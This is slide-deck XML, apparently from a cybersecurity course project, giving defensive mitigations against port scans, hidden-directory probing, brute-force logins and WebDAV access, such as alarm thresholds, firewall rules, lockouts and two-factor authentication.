            </a:r>
            <a:endParaRPr sz="1050" b="1" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1209" name="Google Shape;1209;p70"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4194314" y="1432421"/>
            <a:ext cx="4949686" cy="3464257"/>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configurations can be set on the host to mitigate port scans?</a:t>
            </a:r>
            <a:endParaRPr b="1" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>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r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Enable only the traffic needed to access internal hosts, deny everything else. Including the standard ports, such as TCP 80 for HTTP and ICMP for ping requests. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t>q</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>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endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>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r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Configure the firewall to look for potentially malicious behavior over time and have rules in place to cut off attacks if a certain threshold is reached, such as 10 port scans in one minute or 100 consecutive ping (ICMP) requests.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en" sz="1000" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Describe the solution. If possible, provide required command lines. </a:t>
            </a:r>
            <a:endParaRPr b="1" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>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Create and setup IPtables for the firewall port blocking and scanning. An IDS like Kibana, or SPLUNK allows for an immediate alerting of port scan activity, thereby facilitating rapid response to the potential threats. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:endParaRPr sz="10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A4139190-C5BB-40C2-83AC-BE180EE0A6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pSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="Group 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D34E4457-D3EC-4EA8-96B3-2AC3E34D025D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6268300" y="124643"/>
            <a:ext cx="695400" cy="533701"/>
            <a:chOff x="3404397" y="694486"/>
            <a:chExt cx="695400" cy="749477"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Google Shape;1038;p55">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BDB5818A-24FD-4C24-B35D-A9A8022AC129}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3404397" y="694486"/>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mn-lt"/>
                  <a:ea typeface="STFangsong" panose="020B0503020204020204" pitchFamily="2" charset="-122"/>
                  <a:cs typeface="Roboto Thin"/>
                  <a:sym typeface="Roboto Thin"/>
                </a:rPr>
                <a:t>04</a:t>
              </a:r>
              <a:endParaRPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="STFangsong" panose="020B0503020204020204" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Roboto Thin"/>
                <a:sym typeface="Roboto Thin"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Google Shape;1039;p55">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE184EEE-1F07-4822-9B6A-905B80B8720A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="3576741" y="1255338"/>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Mitigation: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000" dirty="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Finding the Request for the Hidden Directory</a:t>
            </a:r>
            <a:endParaRPr sz="2000" dirty="0">
              <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1216" name="Google Shape;1216;p71"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1423546"/>
            <a:ext cx="4572000" cy="3639254"/>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kind of alarm can be set to detect future unauthorized access?</a:t>
            </a:r>
            <a:endParaRPr b="1" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endParaRPr lang="en-US"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An alarm should be configured to trigger if any request is made for the hidden directories from outside the company’s internal network. The hidden directories are for company use only and should not be accessible from outside the premises.</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Additionally, an alarm should trigger if sequential requests  for the directories are made from a single IP address. An attacker could be probing the directories to see what is available, and that traffic should be blocked. Provide access to only the authorized users to the hidden directories.</a:t>
            </a:r>
            <a:endParaRPr sz="1000" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1000" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>What threshold would you set to activate this alarm?</a:t>
            </a:r>
            <a:endParaRPr b="1" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>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An appropriate threshold for sequential requests from a single IP address should be set for greater than 0 requests made. Send an email to the SOC Analyst when it’s triggered by unknown IP.</a:t>
            </a:r>
            <a:endParaRPr sz="1000" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1217" name="Google Shape;1217;p71"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4440325" y="1423546"/>
            <a:ext cx="4298400" cy="33018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configuration can be set on the host to block unwanted access?</a:t>
            </a:r>
            <a:endParaRPr b="1" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endParaRPr lang="en-US"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Stronger usernames and password requirements for users that have access to the hidden directories.</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Encrypt the contents of the hidden directories, and its contents.</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Disable directories listing in the Apache.</a:t>
            </a:r>
            <a:endParaRPr sz="1000" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1000" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1000" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Describe the solution. If possible, provide required command lines. </a:t>
            </a:r>
            <a:endParaRPr b="1" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>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Create a whitelist for authorized IP addresses.</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Make the folder private by changing permissions.</a:t>
            </a:r>
            <a:endParaRPr sz="10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6484031-03E9-4225-B43A-DE2332C11F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Mitigation: Preventing Brute Force Attacks</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1224" name="Google Shape;1224;p72"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1423544"/>
            <a:ext cx="4572000" cy="3482955"/>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kind of alarm can be set to detect future brute force attacks?</a:t>
            </a:r>
            <a:endParaRPr b="1" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endParaRPr lang="en-US"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An alarm should be set to trigger if a predefined number of requests are issued to the server from a single IP address, especially if those requests result in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>HTTP 401 (Unauthorized) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>responses. Since the brute force attack requires a high number of requests to complete, this traffic could potentially be blocked before the password is guessed.</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Additionally, an alert should be set if any user on the system has several consecutive failed authentication attempts.</a:t>
            </a:r>
            <a:endParaRPr sz="1000" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1000" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>What threshold would you set to activate this alarm?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1000" b="1"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An appropriate threshold should be set for greater than 50 requests from a single IP address in the span of 30 minutes. </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For consecutive failed authentication attempts, the alert should trigger if any user has more than 3 consecutive failed authentication attempts.</a:t>
            </a:r>
            <a:endParaRPr sz="1000" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1225" name="Google Shape;1225;p72"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4499931" y="1423543"/>
            <a:ext cx="4298400" cy="3482955"/>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configuration can be set on the host to block brute force attacks?</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US"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Use unique user names, and stronger passwords. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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Restricting access to authentication URLs</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Setting up a lockout after 3 consecutive failed attempts from the same IP address.</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Two-factor authentications for all users in the company.</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Using CAPTCHA (human vs. machine input)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endParaRPr sz="1000" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Describe the solution. If possible, provide the required command line(s). </a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450" algn="l" rtl="0">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Strong passwords are unique, long, and harder to guess.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450" algn="l" rtl="0">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A requirement for brute force attacks is to send credentials so changing the login page URL can usually be enough to stop most automated tools.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450" algn="l" rtl="0">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Attackers will only be able to try a few passwords.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450" algn="l" rtl="0">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Two-factor authentication requires an additional code.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450" algn="l" rtl="0">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CAPTCHAs prevents access by bots and auto tools. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000"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sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AFA96C78-4BCD-46D4-85B1-5B9ED2FA3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Mitigation: Detecting the WebDAV Connection</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1232" name="Google Shape;1232;p73"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="53961" y="1436798"/>
            <a:ext cx="4298400" cy="33018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kind of alarm can be set to detect future access to this directory?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1000" b="1"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An alarm should be set to trigger if any access to the WebDAV directory is made from outside the company’s internal network.</a:t>
            </a:r>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endParaRPr sz="1000" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>What threshold would you set to activate this alarm?</a:t>
            </a:r>
            <a:endParaRPr sz="1000" b="1" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Any single instance would trigger an alarm, if the WebDAV directory is accessed, or possible of uploading of any files to the directory.</a:t>
            </a:r>
            <a:endParaRPr sz="1000" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1233" name="Google Shape;1233;p73"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4493305" y="1436798"/>
            <a:ext cx="4298400" cy="33018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configuration can be set on the host to control access?</a:t>
            </a:r>
            <a:endParaRPr b="1" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US"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The host should be configured to deny WebDAV uploads by default, and only allow uploads from a specific IP address. This can be accomplished using Apache’s configuration files.</a:t>
            </a:r>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r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Avoid storing instructions for accessing the server that can be accessed by a web browser.</a:t>
            </a:r>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r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Make sure software patches are up to date.</a:t>
            </a:r>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r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Disable WebDAV or make sure it’s configured correctly.</a:t>
            </a:r>
          </a:p>
          <a:p>
